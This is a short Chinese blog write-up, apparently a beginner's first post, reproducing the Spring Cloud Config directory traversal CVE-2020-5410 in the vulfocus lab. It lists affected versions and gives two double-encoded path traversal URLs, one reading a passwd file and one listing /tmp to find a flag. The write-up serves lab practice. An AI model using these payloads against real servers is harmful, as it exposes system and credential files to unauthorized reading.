vulfocus复现CVE-2020-5410
Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。 受影响版本:Spring Cloud Config: 2.1.0 to 2.1.8,Spring Cloud Config: 2.2.0 to 2.2.2
启动靶机
构造poc:
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fpasswd%23foo/development
将命令改成查看tmp文件夹的命令,因为flag一般都存在于tmp文件中
构造poc:
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Ftmp%23foo/development
emm,第一次写博客,还望各位大牛多多指教,本文参考了xuzhiye大佬的写的wp。
菜鸡一个,大佬勿喷